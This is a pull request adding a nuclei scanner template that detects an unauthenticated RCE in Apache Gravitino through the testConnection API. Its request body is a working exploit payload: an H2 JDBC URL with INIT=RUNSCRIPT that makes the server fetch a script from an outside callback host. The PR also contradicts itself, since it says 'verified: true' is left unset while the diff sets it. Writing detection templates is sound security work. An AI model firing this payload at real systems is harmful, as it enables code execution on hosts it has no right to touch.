### PR TITLE
Add CVE-2026-41042 Gravitino unauthenticated RCE template

### DIFF
--- a/http/cves/2026/`CVE-2026-41042.yaml
+++ b/http/cves/2026/`CVE-2026-41042.yaml
@@ -31,6 +31,7 @@ info:
 variables:
   ml_name: "{{rand_base(6)}}"
   db_name: "{{rand_base(8)}}"
+  filename: "{{to_lower(rand_text_alpha(5))}}"
 
 flow: http(1) && http(2)
 
@@ -58,12 +59,12 @@ http:
         Content-Type: application/json
         Accept: application/vnd.gravitino.v1+json
 
-        {"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{db_name}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/poc.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
+        {"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{db_name}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/{{filename}}.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
 
     matchers:
       - type: dsl
         dsl:
           - contains(interactsh_protocol, "http")
-          - contains(interactsh_request, "/poc.sql")
+          - contains(interactsh_request, "/{{filename}}.sql")
           - status_code == 500
         condition: and

--- a/http/cves/2026/`CVE-2026-41042.yaml
+++ b/http/cves/2026/`CVE-2026-41042.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-41042
+
+info:
+  name: Apache Gravitino < 1.2.1 - Unauthenticated Remote Code Execution
+  author: buzhimingdeaikun
+  severity: critical
+  description: |-
+    Apache Gravitino before 1.2.1 is vulnerable to unauthenticated remote code execution. The
+    unauthenticated POST /api/metalakes/{metalake}/catalogs/testConnection endpoint accepts a
+    user-controlled jdbc-url property and passes it to the catalog provider's connection factory
+    without validation. By abusing the bundled H2 driver together with the H2 INIT connection
+    setting, an attacker can make the server fetch and execute arbitrary SQL and Java code at
+    connect time, achieving remote code execution on the host.
+  impact: |-
+    Successful exploitation allows an unauthenticated remote attacker to execute arbitrary code
+    on the Gravitino server with the privileges of the service account, resulting in full
+    compromise of the host and any connected data stores.
+  remediation: |-
+    Upgrade Apache Gravitino to version 1.2.1 or later, which blocks H2 JDBC URLs and drivers in
+    catalog configuration.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-41042
+    - https://lists.apache.org/thread/vdh88wc6j5b38v65ncb111wbbnkf6bvm
+    - https://github.com/Lulztigre/cve-2026-41042
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-41042
+    cwe-id: CWE-20
+  tags: cve,cve2026,apache,gravitino,rce,unauth,oast,interactsh
+
+http:
+  - raw:
+      - |
+        POST /api/metalakes HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"{{rand_base(6)}}"}
+      - |
+        POST /api/metalakes/{{metalake}}/catalogs/testConnection HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{rand_base(6)}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/poc.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
+    extractors:
+      - type: regex
+        name: metalake
+        internal: true
+        group: 1
+        part: body
+        regex:
+          - '"name":"([a-zA-Z0-9_-]+)"'
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http")'
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_request, "/poc.sql")'

--- a/http/cves/2026/`CVE-2026-41042.yaml
+++ b/http/cves/2026/`CVE-2026-41042.yaml
@@ -4,30 +4,35 @@ info:
   name: Apache Gravitino < 1.2.1 - Unauthenticated Remote Code Execution
   author: buzhimingdeaikun
   severity: critical
-  description: |-
-    Apache Gravitino before 1.2.1 is vulnerable to unauthenticated remote code execution. The
-    unauthenticated POST /api/metalakes/{metalake}/catalogs/testConnection endpoint accepts a
-    user-controlled jdbc-url property and passes it to the catalog provider's connection factory
-    without validation. By abusing the bundled H2 driver together with the H2 INIT connection
-    setting, an attacker can make the server fetch and execute arbitrary SQL and Java code at
-    connect time, achieving remote code execution on the host.
-  impact: |-
-    Successful exploitation allows an unauthenticated remote attacker to execute arbitrary code
-    on the Gravitino server with the privileges of the service account, resulting in full
-    compromise of the host and any connected data stores.
-  remediation: |-
-    Upgrade Apache Gravitino to version 1.2.1 or later, which blocks H2 JDBC URLs and drivers in
-    catalog configuration.
+  description: |
+    Apache Gravitino < 1.2.1 contains a remote code execution caused by unsanitized H2 JDBC URL via testConnection API using H2's INIT parameter, letting unauthenticated attackers execute arbitrary Java code remotely, exploit requires H2 usage.
+  impact: |
+    Unauthenticated attackers can execute arbitrary Java code on the server, potentially leading to full system compromise.
+  remediation: |
+    Upgrade to version 1.2.1 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-41042
+    - https://github.com/advisories/GHSA-59xm-4m8c-g3xj
     - https://lists.apache.org/thread/vdh88wc6j5b38v65ncb111wbbnkf6bvm
-    - https://github.com/Lulztigre/cve-2026-41042
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-41042
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cve-id: CVE-2026-41042
     cwe-id: CWE-20
-  tags: cve,cve2026,apache,gravitino,rce,unauth,oast,interactsh
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: apache
+    product: gravitino
+    shodan-query: title:"Gravitino"
+    fofa-query: title="Gravitino"
+  tags: cve,cve2026,apache,gravitino,rce,unauth,oast,h2,jdbc
+
+variables:
+  ml_name: "{{rand_base(6)}}"
+  db_name: "{{rand_base(8)}}"
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -36,26 +41,29 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"name":"{{rand_base(6)}}"}
-      - |
-        POST /api/metalakes/{{metalake}}/catalogs/testConnection HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
+        {"name":"{{ml_name}}"}
 
-        {"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{rand_base(6)}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/poc.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
-    extractors:
-      - type: regex
-        name: metalake
-        internal: true
-        group: 1
-        part: body
-        regex:
-          - '"name":"([a-zA-Z0-9_-]+)"'
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'contains(interactsh_protocol, "http")'
+          - status_code == 200
+          - contains(content_type, "application/json")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /api/metalakes/{{ml_name}}/catalogs/testConnection HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: application/vnd.gravitino.v1+json
+
+        {"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{db_name}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/poc.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
+
+    matchers:
       - type: dsl
         dsl:
-          - 'contains(interactsh_request, "/poc.sql")'
+          - contains(interactsh_protocol, "http")
+          - contains(interactsh_request, "/poc.sql")
+          - status_code == 500
+        condition: and


### PR DESCRIPTION
## Proposed changes

Add a nuclei template for CVE-2026-41042 — unauthenticated remote code execution in
Apache Gravitino before 1.2.1 via a malicious H2 JDBC URL in the `testConnection` API.

Detection flow:

1. `POST /api/metalakes` creates a random metalake (unauthenticated); its name is
   captured with an internal regex extractor.
2. `POST /api/metalakes/{metalake}/catalogs/testConnection` sends a catalog test request
   whose `jdbc-url` uses the bundled H2 driver with
   `INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/poc.sql'`.
3. On vulnerable versions (< 1.2.1) the server fetches the URL at connect time; the
   template matches on the resulting HTTP interaction (`interactsh_protocol` contains
   `http` and the callback path is `/poc.sql`). Fixed versions (>= 1.2.1) reject H2 URLs
   before connecting, so no interaction is generated.

References:

- https://nvd.nist.gov/vuln/detail/CVE-2026-41042
- https://lists.apache.org/thread/vdh88wc6j5b38v65ncb111wbbnkf6bvm
- https://github.com/Lulztigre/cve-2026-41042

## Checklist

- [x] Template placed in the appropriate directory (`http/cves/2026/`)
- [x] YAML syntax validated locally
- [x] Request chain and matcher logic exercised against local mock servers
      (vulnerable and patched behavior)
- [ ] Tested against a real Gravitino instance (no network access in the authoring
      environment), so `verified: true` is intentionally not set